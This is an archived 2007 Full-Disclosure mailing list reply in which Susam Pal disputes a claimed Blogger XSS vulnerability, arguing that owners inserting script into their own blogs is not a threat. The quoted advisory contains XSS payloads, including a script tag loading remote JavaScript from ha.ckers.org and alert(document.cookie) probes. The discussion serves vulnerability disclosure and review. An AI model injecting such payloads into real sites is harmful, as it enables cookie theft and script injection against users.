lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <46BF3119.5020501@susam.in>
Date: Sun, 12 Aug 2007 21:41:05 +0530
From: Susam Pal <susam@...am.in>
To: Daniele Costa <info@...apware.it>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: BLOGGER XSS VULNERABILITY

Why is this a vulnerability? I can't see a way by which an attacker can 
insert JavaScript code into my blog.

 > I've noticed that for any blog hosted at blogspot.com the cookie will
 > be not shown.

The sensitive cookies are not maintained under blogspot.com, so allowing 
JavaScript in blogspot.com doesn't look like a threat or vulnerability.

 > Otherwise, if the blog is located inside your web site, the cookie
 > will be shown.

But I am the only one who is inserting the JavaScript in my blog. So, 
I'll end up stealing the cookies set for my domain. Why would I steal 
cookies set for my domain? I already know them because it is my website.

Regards,
Susam Pal
http://susam.in/

Daniele Costa wrote, On Saturday 11 August 2007 10:52 PM:
> ------------------------------------------------------
> BLOGGER XSS VULNERABILITY
> ------------------------------------------------------
> 
> Blogspot.com
> 
> Homepage: http://www.blogspot.com
> 
> and
> 
> Blogger.com
> 
> Homepage: http://www.blogger.com
> 
> Affected files:
> 
> Post's Input boxes
> 
> ------------------------------------------------------
> XSS DETAILS
> ------------------------------------------------------
> XSS vuln via injecting javascript code into any post.
> 
> Blogger doesn't sanitize user input during post process.
> Try injecting the following code into a post
> 
> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
> 
> or just the well known
> 
> <SCRIPT>alert(document.cookie);</SCRIPT>
> 
> or
> 
> <SCRIPT >alert(document.domain);</SCRIPT>
> 

<!-- COPIED IN REPLY -->

> 
> ------------------------------------------------------
> Proof Of Concept
> ------------------------------------------------------
> 
> http://pocasiculezza.blogspot.com/
> 
> -----------------------------------------------------
> HISTORY
> ------------------------------------------------------
> Discovered : 07/11/2007 by Daniele Costa
> Published : 07/11/2007 by Daniele Costa
> 
> 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ